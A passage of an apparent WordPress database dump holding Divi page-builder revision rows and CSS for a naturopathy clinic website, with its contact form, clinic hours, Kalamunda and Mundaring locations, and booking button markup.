text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-09-14 10:34:46','2021-09-14 02:34:46','',188,'https://verdenaturopathy.com.au/?p=360',0,'revision','',0),(337,1,'2021-08-11 13:46:12','2021-08-11 05:46:12','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2021-08-11 13:46:12','2021-08-11 05:46:12','',188,'https://verdenaturopathy.com.au/?p=337',0,'revision','',0),(308,1,'2021-05-30 19:44:48','2021-05-30 11:44:48','\n\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n padding: 12px!important;\n color: #000000\n}\n\n.et_header_style_left #et-top-navigation {\n padding-top: 20px!important;\n}\n \n.et_header_style_left .et-fixed-header #et-top-navigation {\n padding-top: 6px!important;\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:44:48','2021-05-30 11:44:48','',84,'https://verdenaturopathy.com.au/?p=308',0,'revision','',0),(310,1,'2021-05-30 19:47:34','2021-05-30 11:47:34','\n\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n padding: 12px!important;\n color: #000000\n}\n\n.et_header_style_left #et-top-navigation {\n padding-top: 20px!important;\n}\n \n.et_header_style_left .et-fixed-header #et-top-navigation {\n padding-top: 6px!important;\n}\n\n@media only screen and (max-width: 980px) {\n.menu-cta a {\n background-color: #8dc63f;\n }\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:47:34','2021-05-30 11:47:34','',84,'https://verdenaturopathy.com.au/?p=310',0,'revision','',0),(312,1,'2021-05-30 19:50:38','2021-05-30 11:50:38','\n\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n padding: 12px!important;\n color: #000000\n}\n\n.et_header_style_left #et-top-navigation {\n padding-top: 20px!important;\n}\n \n.et_header_style_left .et-fixed-header #et-top-navigation {\n padding-top: 6px!important;\n}\n\n@media only screen and (max-width: 980px) {\n .menu_cta {\n text-align:center;\n max-width:200px;\n }\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000!important;\n \n padding: 12px!important;\n color: #000000\n }\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:50:38','2021-05-30 11:50:38','',84,'https://verdenaturopathy.com.au/?p=312',0,'revision','',0),(314,1,'2021-05-30 19:52:19','2021-05-30 11:52:19','\n\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000;\n padding: 12px!important;\n color: #000000!important;\n}\n\n.et_header_style_left #et-top-navigation {\n padding-top: 20px!important;\n}\n \n.et_header_style_left .et-fixed-header #et-top-navigation {\n padding-top: 6px!important;\n}\n\n@media only screen and (max-width: 980px) {\n .menu_cta {\n text-align:center;\n max-width:200px;\n }\n.menu_cta a {\n background-color:#ffffff;\n border-radius:28px;\n border:2px solid #000000!important;\n \n padding: 12px!important;\n color: #000000!important;\n }\n}\n','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-30 19:52:19','2021-05-30 11:52:19','',84,'https://verdenaturopathy.com.au/?p=314',0,'revision','',0),(328,1,'2021-06-15 12:43:15','2021-06-15 04:43:15','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"> Mundaring Wellness Centre (16 Craig st, Mundaring)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-06-15 12:43:15','2021-06-15 04:43:15','',26,'https://verdenaturopathy.com.au/?p=328',0,'revision','',0),(331,1,'2021-06-15 12:56:29','2021-06-15 04:56:29','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" 